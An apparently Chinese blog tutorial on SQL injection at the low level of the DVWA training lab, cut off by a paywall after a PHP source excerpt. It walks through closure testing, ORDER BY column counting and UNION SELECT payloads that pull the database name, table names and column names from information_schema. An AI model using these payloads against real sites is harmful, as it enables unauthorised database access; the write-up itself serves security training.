文章目录
前言:
DVWA靶场的sql注入有三个难度等级,通过黑盒注入结合代码审计的形式做一下这个靶场
知识储备:
需要有php、mysql的基础知识,了解sql注入的基本原理
环境
使用VM加载靶机的.ova文件,VM的虚拟机都是可以加载的。
靶机百度网盘下载链接:
https://pan.baidu.com/s/1KaXy5KnXP7Td8s-3zPgalw 密码: jqq7
对于有回显的注入一般的思路就是:拼接sql语句使得查询结果可以显示在页面上。最终得到表名,字段名等敏感数据。
low等级难度
注入过程:
输入合法参数1 ,页面正常输出,有回显位,输入的内容在url中可见,说明是get类型传参,参数是id

查看闭合方式
1 and 1=2 不报错,页面内容正常显示,不是整型闭合

1' and 1=2报错 说明'导致语法错误

1' and 1=2 --+ ,页面无内容,但语法正确

即闭合方式:'

对于有回显的情况,尝试报错注入的思路
查看字段数
1' order by 2 页面正常

1' order by 3 --+//页面报错

得到字段数为:2
union查询 库-表-字段
查询库名和数据库用户名:1.1' union select user(),database() --+

查询当前数据库的所有表
1.1'union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()--+

查看users表中的所有字段
1.1'union select 1,group_concat(column_name) from information_schema.columns where table_name='users'--+

源码分析:
<?php
if(isset($_GET['Submit'])){
// Retrieve data
$id = $_GET['id']; //没有对$id 做任何的过滤与检查
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
$result = mysql_query($getid) or die('<pre>' . mysql_error()

最低0.47元/天 解锁文章
8392

被折叠的 条评论
为什么被折叠?



